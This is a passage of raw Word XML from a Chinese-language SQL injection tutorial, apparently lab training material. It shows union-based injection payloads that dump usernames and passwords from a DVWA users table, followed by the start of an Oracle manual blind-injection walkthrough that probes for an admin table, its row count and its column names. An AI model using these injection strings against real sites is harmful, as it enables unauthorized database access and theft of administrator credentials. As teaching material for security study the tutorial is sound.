        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>colum</w:t>
      </w:r>
      <w:r w:rsidR="0036672D" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_name) from information_schema.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> where table</w:t>
      </w:r>
      <w:r w:rsidR="003A49CF" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94CFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x7573657273</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27194DDA" w14:textId="77777777" w:rsidR="00276D91" w:rsidRPr="0036672D" w:rsidRDefault="0036672D" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CB2C6E7" wp14:editId="418532E2">
            <wp:extent cx="5274310" cy="3790950"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3790950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CC5EB8" w14:textId="77777777" w:rsidR="0036672D" w:rsidRPr="006472F7" w:rsidRDefault="0036672D"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注:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x7573657273</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是表名的十六进制，从上图中可以看到表中的所有字段.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5A6701" w14:textId="77777777" w:rsidR="00D83B93" w:rsidRPr="00183DF6" w:rsidRDefault="00183DF6" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00D83B93" w:rsidRPr="00183DF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆当前字段所有帐号和密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262E40A5" w14:textId="77777777" w:rsidR="00D83B93" w:rsidRPr="00CD76A0" w:rsidRDefault="001910E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1.55:8080/dvwa/vulnerabilities/sqli/?id=1'and 1=2</w:t>
      </w:r>
      <w:r w:rsidR="00F94CFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select</w:t>
      </w:r>
      <w:r w:rsidR="00F94CFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1,group_concat(user_id,0x7c,first_name,0x7c,last_name,0x7c,user,0x7c,password,0x7c,avatar,0x7c) from users+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5772C505" w14:textId="77777777" w:rsidR="001910EF" w:rsidRPr="005F124E" w:rsidRDefault="001910EF" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="422"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DFDCCF6" wp14:editId="7CACD06E">
            <wp:extent cx="5274310" cy="4496955"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="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5274310" cy="4496955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD2ACE" w14:textId="77777777" w:rsidR="0036672D" w:rsidRPr="00CD76A0" w:rsidRDefault="001910EF"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通过上图可以看到该表中的指定字段内容.管理员用户名、密码等相关详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53600072" w14:textId="77777777" w:rsidR="00276D91" w:rsidRDefault="00D269A4" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId153" w:history="1">
        <w:r w:rsidR="00480E10" w:rsidRPr="00DE4592">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
            <w:bCs w:val="0"/>
          </w:rPr>
          <w:t>Oracle手工盲注</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24FDE690" w14:textId="77777777" w:rsidR="00480E10" w:rsidRPr="00480E10" w:rsidRDefault="003201E0" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00480E10" w:rsidRPr="00480E10">
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidR="00480E10" w:rsidRPr="00480E10">
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidR="00480E10" w:rsidRPr="00480E10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82F14A" w14:textId="77777777" w:rsidR="00480E10" w:rsidRPr="00CD76A0" w:rsidRDefault="00480E10"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Oracle数据库系统是美国ORACLE公司（甲骨文）提供的以分布式数据库为核心的一组软件产品。是目前世界上使用最为广泛的数据库管理系统。基于“客户端/服务器”模式结构，客户端应用程序与用户交互，接收用户信息，并向服务器发送请求，服务器系统负责管理数据信息和各种操作数据的活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296F6898" w14:textId="77777777" w:rsidR="00480E10"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Oracle数据库特征：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C585A" w14:textId="77777777" w:rsidR="00480E10"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1)支持多用户、大事务量的处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA632F7" w14:textId="77777777" w:rsidR="00480E10" w:rsidRPr="00CD76A0" w:rsidRDefault="00480E10" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="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2)数据安全性和完整性的有效控制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FDDF08" w14:textId="77777777" w:rsidR="00480E10" w:rsidRPr="00CD76A0" w:rsidRDefault="00480E10" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>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3)支持分布式数据处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6223AC" w14:textId="77777777" w:rsidR="00480E10" w:rsidRPr="00CD76A0" w:rsidRDefault="00480E10" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>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4)移植性强</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FF81A8" w14:textId="77777777" w:rsidR="00480E10" w:rsidRPr="00480E10" w:rsidRDefault="003201E0" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00480E10" w:rsidRPr="00480E10">
        <w:t>Sql</w:t>
      </w:r>
      <w:r w:rsidR="00480E10" w:rsidRPr="00480E10">
        <w:t>注入形成原因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761DF3C1" w14:textId="77777777" w:rsidR="00480E10"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ql注入形成的主要原因是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761D1843" w14:textId="77777777" w:rsidR="00480E10" w:rsidRPr="00CD76A0" w:rsidRDefault="00480E10"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由于程序员的安全意识薄弱，在编写代码时没有对用户输入的特殊字符进行处理，导致将特殊字符附带在参数中直接与数据库进行交互。示例代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5538CAEF" w14:textId="77777777" w:rsidR="00276D91" w:rsidRDefault="00480E10" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CC50EB7" wp14:editId="7ED2349B">
            <wp:extent cx="5274310" cy="1165728"/>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274310" cy="1165728"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECE11C1" w14:textId="77777777" w:rsidR="00480E10" w:rsidRPr="00CD76A0" w:rsidRDefault="00480E10"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由第二三行代码可以看出，接收到的参数id没有经过处理就直接执行。由于对and，select等关键字没有过滤。所以接下来我们可以使用and，select等构造sql语句来得到管理员帐号密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428C1EA3" w14:textId="77777777" w:rsidR="001564B2" w:rsidRDefault="003201E0" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="001564B2" w:rsidRPr="001564B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidR="001564B2" w:rsidRPr="001564B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手工注入实战</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14802111" w14:textId="77777777" w:rsidR="0092612F" w:rsidRPr="0092612F" w:rsidRDefault="0092612F" w:rsidP="0092612F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="0092612F">
        <w:t>http://v.youku.com/v_show/id_XOTYxMzgyODM2.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12815874" w14:textId="77777777" w:rsidR="00480E10"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1.首先我们判断一下有没有注入点，在公司新闻下打开一个新闻链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网址后加and 1=1返回正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B145D" w14:textId="77777777" w:rsidR="00480E10" w:rsidRPr="00480E10" w:rsidRDefault="00480E10" w:rsidP="00901209">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:ind w:right="540" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61390C00" wp14:editId="648E5934">
            <wp:extent cx="5839431" cy="3371850"/>
            <wp:effectExtent l="19050" t="0" r="8919" b="0"/>
            <wp:docPr id="83" name="图片 4" descr="http://erange.heetian.com/server/files/upload/guidebook/image/c5e733a2-43d4-4d38-906d-fc1361ccf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ange.heetian.com/server/files/upload/guidebook/image/c5e733a2-43d4-4d38-906d-fc1361ccf5ba.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId155"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5839431" cy="3371850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB8EC6F" w14:textId="77777777" w:rsidR="00480E10"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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加and 1=2返回错误，说明存在注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43531E17" w14:textId="77777777" w:rsidR="00480E10" w:rsidRDefault="00480E10" w:rsidP="00901209">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:ind w:right="540" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44010DBC" wp14:editId="7778CA13">
            <wp:extent cx="5384849" cy="3248025"/>
            <wp:effectExtent l="19050" t="0" r="6301" b="0"/>
            <wp:docPr id="97" name="图片 7" descr="http://erange.heetian.com/server/files/upload/guidebook/image/1f020bce-3666-4c40-b57e-611fcb79a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ange.heetian.com/server/files/upload/guidebook/image/1f020bce-3666-4c40-b57e-611fcb79ab50.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId156"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5384849" cy="3248025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B621EF" w14:textId="77777777" w:rsidR="00276D91" w:rsidRPr="00CD76A0" w:rsidRDefault="00480E10"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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.判断一下数据库中的表，网址后加上：and (select count(*) from admin) &lt;&gt;0返回正常，说明存在admin表。如果返回错误，可将admin改为username、manager等常用表名继续猜解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7440B5E6" w14:textId="77777777" w:rsidR="00FE386E" w:rsidRDefault="00480E10" w:rsidP="00200887">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FED2081" wp14:editId="7704DA63">
            <wp:extent cx="5267325" cy="2562225"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="98" name="图片 10" descr="http://erange.heetian.com/server/files/upload/guidebook/image/de3b6f0a-7788-4c2b-a9be-779be63d7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range.heetian.com/server/files/upload/guidebook/image/de3b6f0a-7788-4c2b-a9be-779be63d74c7.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId157"/>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14:paraId="718F1DDB" w14:textId="77777777" w:rsidR="00480E10" w:rsidRPr="00CD76A0" w:rsidRDefault="00FE386E"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4</w:t>
      </w:r>
      <w:r w:rsidR="00480E10" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.判断下该网站下有几个管理员，如果有多个的话，成功入侵的几率就会加大and (select count(*) from admin)=1，返回正常说明只有一个管理员。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A794A94" w14:textId="77777777" w:rsidR="00480E10" w:rsidRPr="00480E10" w:rsidRDefault="00FE386E" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="103B0CF7" wp14:editId="446D2317">
            <wp:extent cx="5267325" cy="2219325"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="100" name="图片 19" descr="http://erange.heetian.com/server/files/upload/guidebook/image/fc976262-b6d4-4c41-a0c1-eb8072ab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range.heetian.com/server/files/upload/guidebook/image/fc976262-b6d4-4c41-a0c1-eb8072abe101.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId158"/>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14:paraId="3A2ED886"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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.已知表的前提下，判断表中字段结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32354E78" w14:textId="77777777" w:rsidR="001564B2" w:rsidRPr="00CD76A0" w:rsidRDefault="006472F7"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kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001564B2" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and (select count(name) from admin)&gt;=0返回正常，说明存在name字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42101781" w14:textId="77777777" w:rsidR="00276D91" w:rsidRDefault="001564B2" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29E80E83" wp14:editId="4681734F">
            <wp:extent cx="5267325" cy="2514600"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="101" name="图片 22" descr="http://erange.heetian.com/server/files/upload/guidebook/image/4b86863c-58ff-4cb6-b02b-7cc16252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range.heetian.com/server/files/upload/guidebook/image/4b86863c-58ff-4cb6-b02b-7cc162527128.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId159"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="2514600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E627565"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and (select count(pass) from admin)&gt;=0返回错误，说明不存在pass字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E931D" w14:textId="77777777" w:rsidR="001564B2" w:rsidRDefault="001564B2" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
